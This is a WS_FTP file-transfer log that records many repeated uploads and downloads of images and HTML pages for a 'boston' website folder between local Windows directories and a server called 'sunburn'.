10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:47 B C:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:47 B C:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:47 B C:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:47 B C:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:47 B C:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:47 B C:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:47 B C:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:47 B C:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:47 B C:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:47 B C:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:47 B C:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:47 B C:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
